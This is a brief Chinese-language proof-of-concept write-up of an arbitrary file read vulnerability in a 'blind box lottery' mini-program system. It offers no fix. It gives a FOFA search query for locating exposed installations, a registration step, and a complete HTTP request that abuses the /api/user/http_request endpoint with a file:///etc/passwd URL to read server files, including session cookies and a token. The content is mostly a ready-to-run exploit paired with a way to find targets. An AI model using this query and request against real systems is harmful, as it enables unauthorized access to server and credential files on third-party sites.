# 盲盒抽奖小程序系统存在任意文件读取漏洞

# 一、漏洞简介
盲盒抽奖小程序系统存在任意文件读取漏洞

# 二、影响版本
+ 盲盒抽奖小程序系统

# 三、资产测绘
+ fofa

```plain
"vendor/owl.carousel2/assets/owl.carousel.css" && "img/arrow-left.png"
```

+ 特征

![1731491896473-24d5cb3b-d315-42f2-9ec1-1f134e61a755.png](./img/dpPBebsZuuMRaArk/1731491896473-24d5cb3b-d315-42f2-9ec1-1f134e61a755-241134.png)

# 四、漏洞复现
先注册一个账号

```plain
/index/user/register.html
```

![1731491909841-961c0fff-99f9-4dbf-98ac-12b86fdd1ca5.png](./img/dpPBebsZuuMRaArk/1731491909841-961c0fff-99f9-4dbf-98ac-12b86fdd1ca5-628641.png)

```plain
GET /api/user/http_request?url=file:///etc/passwd HTTP/2.0
Host: 
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
cookie: PHPSESSID=6e6b24gm79uba18etg6j1cj3a5
cookie: think_var=zh-cn
cookie: uid=22
cookie: token=44ee3c7f-0b30-4e2d-9357-4442231c49b0
```

![1731491856618-2fb8c5e0-7d17-4677-bc31-70b72099de96.png](./img/dpPBebsZuuMRaArk/1731491856618-2fb8c5e0-7d17-4677-bc31-70b72099de96-714752.png)



> 更新: 2024-11-27 10:00:07  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/omoxpfzm1rmvt1du>